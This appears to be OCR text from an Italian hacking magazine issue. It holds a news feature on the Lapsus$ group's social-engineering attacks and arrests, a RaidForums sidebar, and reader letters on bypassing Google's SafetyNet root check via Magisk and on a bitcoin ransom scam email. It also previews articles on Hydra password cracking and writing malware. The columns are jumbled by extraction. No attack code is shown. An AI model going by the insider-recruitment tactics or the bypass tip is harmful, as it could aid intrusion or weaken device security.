sono incredibili. Già, ma chi sono Se vogliamo tracciare la storia vista della capacità di muoversi
questi pirati? Si tratta di Lapsus$, di Lapsus$, bisogna tornare agli con stile e in maniera circospetta.
un gruppo di ragazzi molto ultimi mesi del 2021, a un attacco Dopo il Brasile e il Portogallo, la
giovani, una cybergang guidata da che ha colpito il Ministero della cybergang è passata a colpire altri

58
 CYBERCRIMINE
bersagli mentre al suo interno e portando altre informazioni

RA ID FO RU M S
arrivavano nuovi giovanissimi utili per far stringere il cerchio

SE Q U ESTR ATO
aspiranti pirati. Rimaneva al centro, da parte delle autorità attorno
però, un gruppo di hacker tra alla cybergang.
i quali, si è scoperto dopo che
la polizia britannica ha arrestato IL MODUS OPERANDI
il vertice della posse, il capo. Cioè Come si muoveva Lapsus$? Il sito RaidForums, utilizzato
White, un ragazzo di sedici anni Tra le caratteristiche del suo modo (anche da Lapsus$)
che vive con la madre in una casa di operare c’è sicuramente l’uso principalmente per lo scambio
vicino a Oxford, in Inghilterra. di Telegram, spesso in modo e la vendita di database rubati,
è stato chiuso e il suo dominio
Un ragazzino che, secondo le chat imprudente anche se efficace. Con
è stato sequestrato dalle forze

s
intercettate, è stato in grado di 50mila iscritti, il canale di Lapsus$ è dell’ordine statunitensi durante
coordinare un attacco a T-Mobile a diventato l’hub dal quale sono stati l’operazione Tourniquet,
marzo, rubando il codice sorgente organizzati gli attacchi, raccolte le un’azione coordinata da

ew
di una serie di progetti e prodotti informazioni, ma anche condivisi i Europol. Diogo Santos Coelho,
software rilevanti. dati e fatto rumore per dimostrare il pirata portoghese conosciuto
come “Omnipotent”, aveva
che la posse di pirati era attiva
14 anni quando ha creato
GLI ATTACCHI SU LARGA SCALA e i suoi supporter rumorosi. RaidForums nel 2015.
Dopo l’esordio a fine 2021, infatti, Inoltre, per come è costruita l’app Adesso è stato arrestato e ha
nel corso dei primi mesi del 2022 di Telegram e il tipo di garanzie di l’età “sbagliata” per finire tra le
_n
gli attacchi si sono fatti sempre più anonimato che riesce a dare nella maglie della giustizia: 21 anni.
Secondo la polizia americana
importanti e su grande scala: oltre costruzione dei profili usando dei
il market ha messo in vendita
a T-Mobile ci sono Microsoft, “burner” (dei numeri di telefono
più di 10 miliardi di elementi
Nvidia, Okta (una importante usa-e-getta), per Lapsus$ è stato unici provenienti da centinaia
piattaforma di autenticazione delle possibile fare di più. Il canale di database rubati, cosa che ha
lia

identità digitali), Samsung, Ubisoft. Telegram è infatti diventato coinvolto anche molti residenti
L’ossessione di White era sempre il punto di partenza per arruolare negli USA. Secondo le autorità,
RaidForums aveva più di
la stessa: trovare codice sorgente delatori e insider, le persone
mezzo milione di utenti ed “era
e renderlo di fatto open, capaci di girare informazioni chiave considerato uno dei più grandi
condividendolo. Ma c’è di più. dal punto di vista del social
ita

forum di hacking del mondo”.

Quello che non era codice sorgente engineering. È la pratica Prima di diventare uno dei
veniva immancabilmente squisitamente hacker di ingegneria luoghi preferiti per vendere dati
cancellato. Ma Lapsus$ sociale per cui si riesce, rubati, RaidForums è stato
all’inizio un luogo virtuale dove
non si è fermato qui. Negli USA da una serie di informazioni
organizzare vari tipi di molestie
probabilmente passerà alla storia apparentemente limitate e
@

elettroniche, tra cui lo

l’attacco a Nvidia. Dopo aver parzialmente rilevanti, a costruire “swatting” (false segnalazioni
portato via più di un Terabyte lo scenario completo e poi far che portano a raid dei gruppi
di dati, compresi quelli dei partire gli attacchi di phishing Swat della polizia americana)
dipendenti, la richiesta piuttosto veri e propri. In questa fase delle e altri attacchi vandalici.
inconsueta di Lapsus$ è stata cyberguerre, infatti, molti attacchi
quella di rendere Open Source non sono più basati sullo
i driver delle schede video,
pena la loro completa
Lapsus$, una cybergang molto
cancellazione. La risposta di Nvidia
passerà anch’essa agli annali della giovane, con un minorenne
storia: un black team dell’azienda al vertice, capace di mettere
ha infiltrato i computer degli
attaccanti e ha crittato i dati rubati,
in ginocchio la sicurezza
annullando di fatto la minaccia dei colossi dell’informatica
59
 HACKULTURE
e mirati alla distruzione del valore
GA LEOT TI della proprietà privata digitale,
FU RO N O I D N S una vera e propria guerra
ideologica, che ha aiutato le
I più esperti e paranoici tra autorità a capire il modello degli
i membri di Lapsus$ avevano attacchi. Ma soprattutto, ha creato
subodorato le attenzioni una faida interna con l’altro “capo”
da parte delle forze dell’ordine della posse, cioè un giovane pirata
a causa del silenzioso
brasiliano, che è entrato
spostamento del DNS,
avvenuto nottetempo, di alcuni
ripetutamente in conflitto con

s
server usati per le chat interne White sino a rendere pubblici i dati
alternative a Telegram. Uno personali di quest’ultimo, tenevano tutto “nella nuvola”.
spostamento che era la prima mettendo sostanzialmente Ma questa strategia alla fine gli

ew
traccia che qualcuno aveva la parola fine alle attività di si è ritorta contro: la polizia, infatti,
capito cosa stava succedendo
Lapsus$ e portando all’arresto ha trovato il server AWS Amazon
e stava tirando la sua rete.
di White e altre sei persone. usato per archiviare codice
sorgente e altri dati rubati e lo ha
ATTENTI AL CLOUD sequestrato, mettendo le mani in
sfruttamento di una semplice Le operazioni coordinate della un unico colpo su tutto quello che
_n
vulnerabilità tecnologica, magari polizia, dunque, hanno consentito poteva servire a incriminare tutti
exploitata in maniera automatica. di smantellare la posse. i membri della posse. “Siamo finiti
Invece, ci si sporca le mani di Un aspetto notevole di Lapsus$ – ha scritto uno dei cybercriminali
persona, chiamando e magari è che i suoi membri – l’FBI ha sequestrato il server.
incontrando alcune delle persone apparentemente avevano deciso È pieno di merda illegale, siamo
lia

che servono per ottenere dati di non conservare mai sui propri finiti”. Alla fine, il cloud ha
necessari all’attacco vero e proprio. computer i dati rubati alle aziende dimostrato ancora una volta
Telegram veniva usato violate. Talmente paranoici che che in realtà è solo il computer
semplicemente per entrare la polizia potesse fare irruzione, di qualcun altro.
in contatto in maniera anonima
ita

con le persone “interne”, pagate

per passare tutte le chiavi e le
procedure necessarie per copiare
o cancellare i dati.
@

DENTRO LA CYBERGANG
Il punto debole di Lapsus$, la più
grande e giovane posse online
che la storia digitale ricordi,
è stato però proprio il suo leader
carismatico e dispotico, White.
Il giovane di Oxford, ossessionato
dall’idea di sparare sempre più
in alto non per produrre un utile,
ma per rubare codice sorgente
e rimetterlo in libertà, alla fine ha Per Okta la violazione di Lapsus$
creato conflitti interni e attirato
troppo l’attenzione. È stata proprio
a gennaio è durata 25 minuti
questa foga negli attacchi, ripetuti e ha impattato due clienti, non 366
60
 N E@ H AC KE RJ O U RN A L .i t
REDAZIO

REPLY
n la redazione insieme
Condividi i tuoi dubbi co
nti su quello che vorresti
a nuove idee e suggerime it
zione@hackerjournal.
vedere sulla rivista: reda

s
VOGLIO PIÙ SICUREZZA MAIL DAL MIO INDIRIZZO diverso da quello reale. A nostro
E PERDO GOOGLE PAY! Ho ricevuto un messaggio avviso, perciò, si tratta di un
Possiedo uno smartphone Pixel di posta elettronica spedito dal classico tentativo di truffa a cui

ew
2 XL che dall’anno scorso non mio stesso account di posta non dovresti dare importanza.
riceve più gli aggiornamenti di Gmail in cui mi si comunica Per escludere ogni possibile
di sicurezza di Google. L’unico che sono riusciti ad accedere problema ti consigliamo però
modo per averli è quello al mio account Google e che se di attivare direttamente dalle
di installare una ROM come non voglio che venga toccato Impostazioni di Google il sistema
LineageOS che, oltretutto, devo inviare 400$ in bitcoin. di accesso a doppia verifica che
_n
è aggiornata a Android 12. Naturalmente ho provveduto richiede una conferma dallo
Per installarla ho però dovuto a modificare immediatamente smartphone prima di poter
prima ottenere i privilegi di la password dell’account, ma accedere. In questo modo anche
root, solo che adesso non mi ho ricevuto a distanza di un se la tua password fosse
funzionano più Google Pay e le giorno una seconda mail in cui hackerata, i pirati non
lia

app bancarie. Come posso fare? il riscatto viene aumentato potrebbero comunque accedere
 Claudio a 500$. A questo punto cosa al tuo account di Google.
posso fare? Ho cambiato una
Si tratta della classica seconda volta la password, ma
situazione lose-lose, in cui ho paura che in qualche modo
ita

comunque avrai un problema di questi pirati riescano ad

sicurezza. In realtà la certificazione accedere al mio account .
SafetyNet di Google, che Silvia
impedisce l’uso delle app bancarie
e di Google Pay sui telefoni con Il fatto che il mittente della
@

root, è un sistema di protezione mail risulti tu stessa non è

preventivo dovuto al fatto che in realtà significativo. Esistono
un malware eseguito come root infatti diversi software che
permetterebbe a dei pirati consentono di modificare il
informatici di accedere ai file di mittente indicando un nome
Google Pay e quindi di recuperare
i dati delle nostre carte di credito.
È comunque possibile sbloccare Uno smartphone con i privilegi
questa protezione installando il
modulo Universal SafetyNet Fix
di root è maggiormente a rischio
di Magisk. A nostro parere rimane malware in quanto consente
però sconsigliabile inserire i dati
di superare la sandbox e accedere
delle carte di credito in un
dispositivo con i privilegi di root. ai dati delle carte di credito

61
 Il prossimo nu mero
luglio
sa ra‘ in ed icola da l 5
Scansione avanzata
del Wi-Fi pirati per
eferita dai
Scopriamo la tecnica pr
ggiano nell’etere
carpire i pacchetti che via

NTFS forea n sics

un file senza
Ecco come si cancell

s
recuperarlo
lasciare la possibilità di

A scuola ew M i s c r i vo
un malware
_n
di pentesting
in Python
izza un programma
Studiamo come si real Python e come
lia

Rompiamo malevolo in linguaggio controllato

la password dell’utente provarlo in un ambiente
admin con Hydra!
ita

SERVIZIO QUALITÀ EDICOLANTI E DL Distributore per l’Estero: SO.DI.P S.p.A. Via Bettola, 18 - 20092 Cinisello Balsamo (MI)
Sonia Lancellotti, Virgilio Cofano, Luca Majocchi: Tel. 02 92432295 Tel. +390266030400 - Fax +390266030269 - sies@sodip.it - www.sodip.it
distribuzione@sprea.it 351 5582739
Stampa: Arti Grafiche Boccia S.p.A.- Via Tiberio Claudio Felice, 7- 84131 Salerno
ABBONAMENTI E ARRETRATI
Abbonamenti: si sottoscrivono on-line su www.sprea.it/hackerjournal Copyright: Sprea S.p.A.
@

abbonamenti@sprea.it Informativa su diritti e privacy

Tel. 02 87168197 (lun-ven / 9:00-13:00 e 14:00-18:00) La Sprea S.p.A. titolare esclusiva della testata Hacker Journal e di tutti i diritti di pub-
Il prezzo dell’abbonamento è calcolato in modo etico perché sia un servizio blicazione e di diffusione in Italia. L’utilizzo da parte di terzi di testi, fotografie e dise-
utile e non in concorrenza sleale con la distribuzione in edicola. gni, anche parziale, è vietato. L’Editore si dichiara pienamente disponibile a valutare -
e se del caso regolare - le eventuali spettanze di terzi per la pubblicazione di immagini
Arretrati: si acquistano on-line su www.sprea.it/arretrati
di cui non sia stato eventualmente possibile reperire la fonte. Informativa e Consenso
abbonamenti@sprea.it
Mensile - prezzo di copertina 3,90 € in materia di trattamento dei dati personali (Codice Privacy d.lgs. 196/03). Nel vigore
Tel. 02 87168197 (lun-ven / 9:00-13:00 e 14:00-18:00)
www.hackerjournal.it - redazione@hackerjournal.it del D.Lgs 196/03 il Titolare del trattamento dei dati personali, ex art. 28 D.Lgs. 196/03,
329 3922420 è Sprea S.p.A. (di seguito anche “Sprea”), con sede legale in Via Torino, 51 Cernusco sul
La Divisione Informatica di Sprea edita anche: Naviglio (MI). La stessa La informa che i Suoi dati, eventualmente da Lei trasmessi
WIN MAGAZINE ✦ LINUX PRO ✦ UBUNTU FACILE FOREIGN RIGHTS alla Sprea, verranno raccolti, trattati e conservati nel rispetto del decreto legislativo
MAC MAGAZINE✦ APP JOURNAL ✦IL MIO COMPUTER IDEA Paolo Cionti: Tel. 02 92432252 - paolocionti@sprea.it ora enunciato anche per attività connesse all’azienda. La avvisiamo, inoltre, che i Suoi
Business Unit Manager: Massimiliano Zagaglia dati potranno essere comunicati e/o trattati (sempre nel rispetto della legge), anche
Cover: Luca Patrian all’estero, da società e/o persone che prestano servizi in favore della Sprea. In ogni
SERVIZI CENTRALIZZATI
Impaginazione: Alessandro Buonaiuto momento Lei potrà chiedere la modifica, la correzione e/o la cancellazione dei Suoi
Art director: Silvia Taietti
Hanno collaborato: Antonio Dini, Francesco Pensabene, Maurizio Russo, dati ovvero esercitare tutti i diritti previsti dagli artt. 7 e ss. del D.Lgs. 196/03 mediante
Grafici: Alessandro Bisquola, Tamara Bombelli, Nicole Bombelli, Nicolò Digiuni,
Noemi Chierchia, Vincenzo Digilio, Servizi editoriali: Backdoor di Gianmarco Bruni comunicazione scritta alla Sprea e/o direttamente al personale Incaricato preposto al
Marcella Gavinelli, Luca Patrian trattamento dei dati. La lettura della presente informativa deve intendersi quale pre-
Sprea S.p.A. Coordinamento: Chiara Civilla, Tiziana Rosato, Roberta Tempesta, Silvia Vitali sa visione dell’Informativa ex art. 13 D.Lgs. 196/03 e l’invio dei Suoi dati personali alla
Sede Legale: Via Torino, 51 20063 Cernusco Sul Naviglio (Mi) - Italia Amministrazione: Erika Colombo (responsabile), Silvia Biolcati, Irene Citino, Sprea varrà quale consenso espresso al trattamento dei dati personali secondo quanto
PI 12770820152- Iscrizione camera Commercio 00746350149 Desirée Conti, Sara Palestra - amministrazione@sprea.it sopra specificato. L’invio di materiale (testi, fotografie, disegni, etc.) alla Sprea S.p.A.
Per informazioni, potete contattarci allo 02 924321 Ufficio Legale: Francesca Sigismondi deve intendersi quale espressa autorizzazione alla loro libera utilizzazione da parte di
CDA: Luca Sprea (Presidente), Alessandro Agnoli (Amministratore Delegato), Sprea S.p.A. Per qualsiasi fine e a titolo gratuito, e comunque, a titolo di esempio, alla
Hacker Journal, registrata al tribunale di Milano il 27/10/2003 con il numero 601. pubblicazione gratuita su qualsiasi supporto cartaceo e non, su qualsiasi pubblicazio-
Giulia Spreafico (Divisione digital), Stefano Pernarella (ADV & PR)
ISSN 1594-5774 ne (anche non della Sprea S.p.A.), in qualsiasi canale di vendita e Paese del mondo.
ADVERTISING, SPECIAL PROJECTS & EVENTS Direttore responsabile: Luca Sprea
Segreteria: Emanuela Mapelli - Tel. 02 92432244 - emanuelamapelli@sprea.it Distributore per l’Italia: Press-Di Distribuzione stampa e multimedia s.r.l. - 20090 Segrate Il materiale inviato alla redazione non potrà essere restituito.
 IN EDICOLA
DAL 3 MAGGIO

s
ew
_n
lia
ita
@

edi67
Scansiona il QR Code

Acquistala su www.sprea.it/mototours
versione digitale disponibile dal 30 aprile
 PU BBLICITÀ
100% INDIPENDENTE! NO

T utto quello
ch e g l i a l t r i

s
n o n o s a n o d i r t i !

IN QUES T O N U M E R O ew
_n
POLYNETWORK | Furto colossale di criptovalute
lia

Le blockchain si presentano come un sistema “sicuro” per memorizzare

informazioni, ma il livello di sicurezza reale dipende dalle implementazioni
ita

FILESYSTEM | Alla scoperta di NTFS!

Chi ha detto che un file cancellato lo è per sempre? Studiamo il metodo
di cancellazione dei file e come riottenere le informazioni “sparite”
@

CYBERCRIMINE | Lapsus$ ha messo nel sacco le big tech

Un gruppo di hacker giovanissimi ha messo in piedi operazioni molto
sofisticate contro i colossi della tecnologia

LETTERE | Voglio più sicurezza e perdo Google Pay

Le domande dei lettori, le risposte degli esperti della redazione.
Anche online sul nostro sito: https://hackerjournal.it

NUMERO 263 • MENSILE • 3.90 €

P.I. 07-06-2022 - Giugno

Prezzi esteri: AUT € 7,50 - BE € 7,00 - LUX € 6,50 - F+PM € 9,50 FR + € 10,50 PM - ES € 6,00 - PT (Cont.) € 5,50 - CH Tedesca CHF 8,3 - CH Ticino CHF 7,3 - OLANDA € 7,50